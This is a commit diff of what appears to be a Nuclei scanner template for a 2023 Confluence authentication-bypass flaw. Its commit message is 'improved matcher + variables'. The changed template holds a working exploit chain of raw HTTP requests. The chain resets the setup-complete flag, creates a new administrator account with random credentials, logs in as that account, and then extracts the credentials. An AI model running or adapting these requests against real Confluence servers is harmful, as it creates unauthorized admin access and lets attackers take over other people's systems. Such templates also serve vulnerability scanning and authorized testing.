improved matcher + variables
parent
0471ab31c7
commit
b09a224654
|
@ -26,20 +26,22 @@ info:
|
|||
fofa-query: app="ATLASSIAN-Confluence"
|
||||
tags: cve,cve2023,confluence,auth-bypass,kev,intrusive
|
||||
|
||||
variables:
|
||||
username: "{{rand_base(10)}}"
|
||||
password: "{{rand_base(10)}}"
|
||||
email: "{{username}}@{{password}}"
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /setup/setupadministrator-start.action HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Connection: close
|
||||
- |
|
||||
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache{{randstr}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Connection: close
|
||||
- |
|
||||
GET /setup/setupadministrator-start.action HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Connection: close
|
||||
- |
|
||||
@timeout:20s
|
||||
POST /setup/setupadministrator.action HTTP/1.1
|
||||
|
@ -47,7 +49,7 @@ http:
|
|||
Content-Type: application/x-www-form-urlencoded
|
||||
X-Atlassian-Token: no-check
|
||||
|
||||
username={{to_lower(username)}}&fullName=admin&email={{randstr_3}}%40{{randstr_4}}.com&password={{password}}&confirm={{password}}&setup-next-button=Next
|
||||
username={{to_lower(username)}}&fullName=admin&email={{email}}.com&password={{password}}&confirm={{password}}&setup-next-button=Next
|
||||
- |
|
||||
POST /dologin.action HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
@ -55,16 +57,12 @@ http:
|
|||
X-Atlassian-Token: no-check
|
||||
|
||||
os_username={{to_lower(username)}}&os_password={{password}}&login=Log+in&os_destination=%2Findex.action
|
||||
- |
|
||||
GET /welcome.action HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
attack: pitchfork
|
||||
payloads:
|
||||
username:
|
||||
- "{{randstr_1}}"
|
||||
password:
|
||||
- "{{randstr_2}}"
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
|
@ -72,4 +70,11 @@ http:
|
|||
- contains(body_3, 'Please configure the system administrator account for this Confluence installation')
|
||||
- contains(location_5, '/index.action')
|
||||
- status_code_5 == 302
|
||||
- contains(body_6, 'Administration')
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- '"USER: "+ username'
|
||||
- '"PASS: "+ password'
|
Loading…
Reference in New Issue